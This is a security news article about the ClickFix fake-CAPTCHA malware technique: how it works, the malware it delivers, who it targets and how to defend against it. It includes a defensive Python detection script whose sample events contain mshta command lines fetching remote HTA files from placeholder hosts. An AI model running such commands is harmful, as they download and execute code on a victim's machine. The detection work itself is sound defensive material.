ClickFix: A Sneaky Malware Attack That Could Infect Your PC in Three Simple Steps

A sophisticated malware deployment technique, known as “ClickFix,” has quickly gone from being part of targeted attacks to a widespread online threat. The scam imitates the familiar “I’m not a robot” CAPTCHA that websites use to distinguish real users from bots. Unfortunately, following the steps to “solve” this fake CAPTCHA can lead to a disastrous malware infection, especially for unsuspecting users.
What Is ClickFix?
ClickFix is a malware scheme that uses a fake CAPTCHA challenge to deceive users into triggering a password-stealing malware download. The attack begins when a user visits a compromised or malicious website, which prompts them with a pop-up resembling a standard CAPTCHA challenge.
How the ClickFix Scam Works
The steps to triggering the malware are deceptively simple and appear innocent enough:
- Step 1: A pop-up asks the user to press the Windows key + R, which opens the Run dialog on a Windows system. The Run dialog will execute whatever command is entered into it, so the system is now poised to run any program the attacker specifies.
- Step 2: The user is then prompted to press Ctrl + V, pasting malicious code into the Run dialog from a clipboard the attacker controls.
- Step 3: Finally, when the user presses Enter, the malware is downloaded and executed via mshta.exe, a Windows program designed for running HTML applications. This process triggers a series of malicious payloads designed to steal passwords and gain control over the victim’s machine.
Types of Malware Delivered by ClickFix
ClickFix is versatile, delivering various types of commodity malware, such as:
- XWorm
- Lumma Stealer
- VenomRAT
- AsyncRAT
- Danabot
- NetSupport RAT
These malware variants can download and execute various content, including PowerShell scripts, JavaScript, and portable executables.
Who’s Being Targeted?
ClickFix attacks are often disguised as legitimate messages, which makes them particularly dangerous. In the hospitality industry, for example, attackers have impersonated Booking.com to target hotel workers. These phishing attempts often reference fake guest reviews or promotional offers, luring users into clicking a malicious link that activates the ClickFix scam.
In a related case, the healthcare sector has also become a prime target. HEP2go, a popular physical therapy video site, was found to redirect unsuspecting visitors to ClickFix prompts. This trend is worrying, as it shows that ClickFix is not just limited to one type of industry.
Other Forms of ClickFix Attacks
ClickFix is a highly adaptable tactic. According to a U.S. Department of Health and Human Services alert, attackers have employed various methods to spread this scam, such as fake Google Chrome error pages and Facebook pop-ups. These malicious websites often mimic legitimate error notifications to trick users into clicking the fake “Fix” button.
A Familiar Phishing Tactic
The use of mshta.exe in ClickFix attacks is reminiscent of previous phishing strategies that embedded exploits in Microsoft Office macros. In response to these threats, Microsoft has taken steps to block macros from downloading content from the web by default. However, this hasn’t stopped attackers from finding new ways to exploit the system.
Phishing Emails and HTML Attachments
Proofpoint, an email security firm, has reported that many ClickFix attacks come in the form of HTML attachments disguised as Microsoft Office files. These files typically present a fake error message when opened, urging users to click a “Solution” or “How to Fix” button. Once clicked, the attack is triggered, and the malware is installed.
How to Protect Against ClickFix Attacks
Organizations and users can take several precautions to prevent ClickFix attacks:
- A Windows Group Policy setting can disable the Run dialog that opens when Windows + R is pressed, removing the launch point this scam relies on.
- Email security solutions can help detect and block phishing emails containing HTML attachments.
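A defender-side check for the mshta.exe launch described in Step 3, added here as an example and not taken from the original article: it scans constructed process-creation records (Sysmon-style field names and placeholder hostnames are assumptions) and flags mshta.exe started by explorer.exe, the parent of anything launched from the Win+R Run dialog, with a remote URL on its command line.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style fields),
# not real telemetry; the hostnames are placeholders.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://captcha-check.example.invalid/verify"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad"},
    {"ParentImage": r"C:\Program Files\Vendor\installer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'mshta "C:\Program Files\Vendor\setup.hta"'},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\SysWOW64\mshta.exe",
     "CommandLine": "mshta http://updates.example.invalid/fix.hta"},
]

REMOTE_RE = re.compile(r"\b(?:https?|ftp)://", re.IGNORECASE)

def basename(path):
    """Last path component, lower-cased, for either slash style."""
    return re.split(r"[\\/]", path)[-1].lower()

def classify(event):
    """Return a verdict string for one process-creation event, or None.

    'clickfix-pattern': mshta.exe started by explorer.exe (the parent of
    anything launched from the Win+R Run dialog) with a remote URL argument.
    'mshta-remote': mshta.exe fetching remote content from some other parent,
    still worth review but not the exact ClickFix chain.
    """
    if basename(event["Image"]) != "mshta.exe":
        return None
    if not REMOTE_RE.search(event["CommandLine"]):
        return None  # local .hta files are common in legitimate installers
    if basename(event["ParentImage"]) == "explorer.exe":
        return "clickfix-pattern"
    return "mshta-remote"

def scan(events):
    """Map event index -> verdict for every event that matched a rule."""
    return {i: v for i, e in enumerate(events) if (v := classify(e))}

if __name__ == "__main__":
    for i, verdict in scan(SAMPLE_EVENTS).items():
        print(f"event {i}: {verdict}: {SAMPLE_EVENTS[i]['CommandLine']}")
```

On a real host, the user's Run dialog history in the HKCU Explorer RunMRU registry key can corroborate a hit by showing the pasted command.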
While ClickFix may seem like just another CAPTCHA test, it’s far from harmless. The ease with which attackers exploit it is alarming, and it’s important for both businesses and individuals to stay vigilant. By understanding the threat and taking proactive measures, users can better protect themselves from falling victim to this and other similar attacks.
Stay safe online! Always double-check before clicking on links and be cautious when interacting with suspicious pop-ups or emails.